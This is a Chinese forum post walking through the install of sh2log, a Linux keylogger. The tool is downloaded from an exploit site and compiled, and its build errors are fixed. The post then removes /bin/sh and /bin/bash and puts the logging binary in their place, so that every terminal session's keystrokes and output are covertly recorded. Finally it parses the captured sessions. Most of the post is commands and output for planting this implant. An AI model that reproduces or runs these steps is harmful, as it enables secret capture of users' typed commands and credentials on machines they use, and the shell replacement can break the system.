[sh2log]Linux键盘记录 keylogger notes

天目山的小竹子 發表於 2023-6-14 00:00:00

不仅可以记录到击键信息，而且包括终端下的输出信息<pre class="brush:bash;toolbar:false"># wget http://www.i0day.com/exp/Linux/sh2log-1.0.tgz
--2013-01-07 05:16:56-- http://www.i0day.com/exp/Linux/sh2log-1.0.tgz
Resolving packetstorm.foofus.com... 64.71.188.242
Connecting to packetstorm.foofus.com|64.71.188.242|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 80240 (78K)
Saving to: `sh2log-1.0.tgz'
100%[=====================================================================================>] 80,240 57.2K/s in 1.4s
2013-01-07 05:16:58 (57.2 KB/s) - `sh2log-1.0.tgz' saved
# tar xf sh2log-1.0.tgz
# cd sh2log-1.0
#</pre>编译选项<pre class="brush:bash;toolbar:false"># make
Please specify the target:
make linux
make freebsd
make openbsd
make cygwin
make sunos
make irix
make hpux
make aix
make osf</pre>如下:<pre class="brush:bash;toolbar:false"># make linux
gcc -g -W -Wall -o sh2log rc4.c sha1.c sh2log.c -lutil -DLINUX
gcc -g -W -Wall -o sh2logd rc4.c sha1.c sh2logd.c
gcc -g -W -Wall -o parser rc4.c sha1.c parser.c -lX11 -L/usr/X11R6/lib
parser.c:35:22: error: X11/Xlib.h: No such file or directory
parser.c: In function ‘main’:
parser.c:291: error: ‘Display’ undeclared (first use in this function)
parser.c:291: error: (Each undeclared identifier is reported only once
parser.c:291: error: for each function it appears in.)
parser.c:291: error: ‘dpi’ undeclared (first use in this function)
parser.c:292: error: ‘Window’ undeclared (first use in this function)
parser.c:292: error: expected ‘;’ before ‘wnd’
parser.c:293: error: ‘XWindowAttributes’ undeclared (first use in this function)
parser.c:293: error: expected ‘;’ before ‘xwa’
parser.c:515: warning: implicit declaration of function ‘XOpenDisplay’
parser.c:522: error: ‘wnd’ undeclared (first use in this function)
parser.c:524: warning: implicit declaration of function ‘XSetWindowBorderWidth’
parser.c:525: warning: implicit declaration of function ‘XSync’
parser.c:525: error: ‘False’ undeclared (first use in this function)
parser.c:526: warning: implicit declaration of function ‘XGetWindowAttributes’
parser.c:526: error: ‘xwa’ undeclared (first use in this function)
parser.c:714: warning: implicit declaration of function ‘XMoveResizeWindow’
parser.c:772: warning: implicit declaration of function ‘XCloseDisplay’
make: *** Error 1</pre>错误：<pre class="brush:bash;toolbar:false">parser.c:35:22: error: X11/Xlib.h: No such file or directory</pre>安装X11<pre class="brush:bash;toolbar:false"># yum install libX11-devel</pre>再编译:<pre class="brush:bash;toolbar:false"># make linux
gcc -g -W -Wall -o sh2log rc4.c sha1.c sh2log.c -lutil -DLINUX
gcc -g -W -Wall -o sh2logd rc4.c sha1.c sh2logd.c
gcc -g -W -Wall -o parser rc4.c sha1.c parser.c -lX11 -L/usr/X11R6/lib</pre>先删除演示：<pre class="brush:bash;toolbar:false"># rm test.bin</pre>配置：<pre class="brush:bash;toolbar:false"># mkdir /bin/shells/
# cp -p /bin/sh /bin/shells/
# cp -p /bin/bash /bin/shells/
# rm -rf /bin/sh /bin/bash
# cp -p sh2log /bin/sh
# cp -p sh2log /bin/bash
# ./sh2logd
# ps -ef | grep sh2logd
root 27151 1 0 05:24 ? 00:00:00 ./sh2logd
root 27175 26396 0 05:24 pts/3 00:00:00 grep sh2logd
#</pre>发现sh2logd 已经启动了当前目录下生成了以时间命名的BIN文件<pre class="brush:bash;toolbar:false">-rw------- 1 root root 0 Jan 7 05:24 sh2log-20130107-052402.bin</pre>查看记录
先打开个终端操作以下：<pre class="brush:bash;toolbar:false"># bash
# ls -la
total 112
drwxr-xr-x 3 root root 4096 Jan 7 05:17 .
drwxrwxrwt 17 root root 4096 Jan 7 05:18 ..
drwxr-xr-x 2 root root 4096 Jan 7 05:24 sh2log-1.0
-rw-r--r-- 1 root root 80240 Nov 8 2006 sh2log-1.0.tgz
# pwd
/tmp/log
#</pre>查看日志：<pre class="brush:bash;toolbar:false"># ./parser sh2log-20130107-052402.bin
SID SOURCE IP UID PID START DATE END DATE DURATION
1 0 (27293) 07/01 05:25 | 07/01 05:25 X 03s
2 0 (27407) 07/01 05:26 | 07/01 05:26 X 02s
In interactive mode, use Enter to fast forward, Space to pause and q to quit.
Note that xterm is required for window resizing.
Session ID -> 2
Interactive mode (y/n) ? n
07/01 05:26:53 -> ls -la
07/01 05:26:53 -> pwd</pre>

頁: [1]

琼殿技术论坛's Archiver

[sh2log]Linux键盘记录 keylogger notes